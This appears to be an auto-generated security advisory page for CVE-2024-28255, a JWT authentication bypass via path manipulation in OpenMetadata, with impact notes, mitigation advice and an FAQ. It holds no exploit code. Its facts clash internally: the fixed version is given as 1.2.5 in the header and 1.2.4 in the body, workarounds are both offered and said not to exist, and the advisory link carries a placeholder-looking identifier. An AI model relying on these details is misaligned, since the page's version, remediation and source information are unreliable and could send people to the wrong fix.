Platform
java
Component
openmetadata
Fixed in
1.2.5
CVE-2024-28255 is a critical authentication bypass vulnerability affecting OpenMetadata versions up to 1.2.3. This flaw allows attackers to circumvent JWT authentication by manipulating request paths, potentially leading to unauthorized access and data compromise. The vulnerability resides in the JwtFilter component, which handles API authentication. A fix is available in version 1.2.4.
The impact of CVE-2024-28255 is severe. An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the OpenMetadata platform. This could allow them to view sensitive metadata, modify configurations, or even execute arbitrary code depending on the platform's permissions model. The ability to manipulate request paths to bypass JWT validation significantly broadens the attack surface. Successful exploitation could result in data breaches, system compromise, and disruption of data governance processes. This vulnerability shares similarities with other path traversal bypass techniques, highlighting the importance of robust input validation.
CVE-2024-28255 was publicly disclosed on March 15, 2024. While no active exploitation campaigns have been publicly reported as of this writing, the vulnerability's critical severity and ease of exploitation make it a high-priority target. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept exploits are likely to emerge, increasing the risk of widespread exploitation.
Exploit Status
EPSS
93.92% (100% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2024-28255 is to upgrade OpenMetadata to version 1.2.4 or later, which includes the fix for this authentication bypass. If upgrading immediately is not feasible, consider implementing temporary workarounds such as restricting access to sensitive endpoints through network firewalls or implementing stricter input validation on the server-side. Review and harden the OpenMetadata configuration to minimize the potential impact of a successful attack. After upgrading, confirm the fix by attempting to access protected endpoints with manipulated paths; authentication should be enforced.
Upgrade OpenMetadata to version 1.2.4 or higher. This version addresses the authentication bypass vulnerability. No workarounds are known, so upgrading is the only recommended solution.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2024-28255 is a critical vulnerability in OpenMetadata versions up to 1.2.3 that allows attackers to bypass JWT authentication by manipulating request paths, potentially gaining unauthorized access.
Yes, if you are running OpenMetadata version 1.2.3 or earlier, you are affected by this vulnerability and should upgrade immediately.
Upgrade OpenMetadata to version 1.2.4 or later to remediate the vulnerability. As a temporary workaround, restrict access to sensitive endpoints or implement stricter input validation.
While no active exploitation campaigns have been publicly reported, the vulnerability's critical severity and ease of exploitation make it a high-priority target.
Refer to the OpenMetadata security advisory for detailed information and updates: [https://github.com/open-metadata/open-metadata/security/advisories/GHSA-9999-9999-9999](https://github.com/open-metadata/open-metadata/security/advisories/GHSA-9999-9999-9999)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your pom.xml file and we'll tell you instantly if you're affected.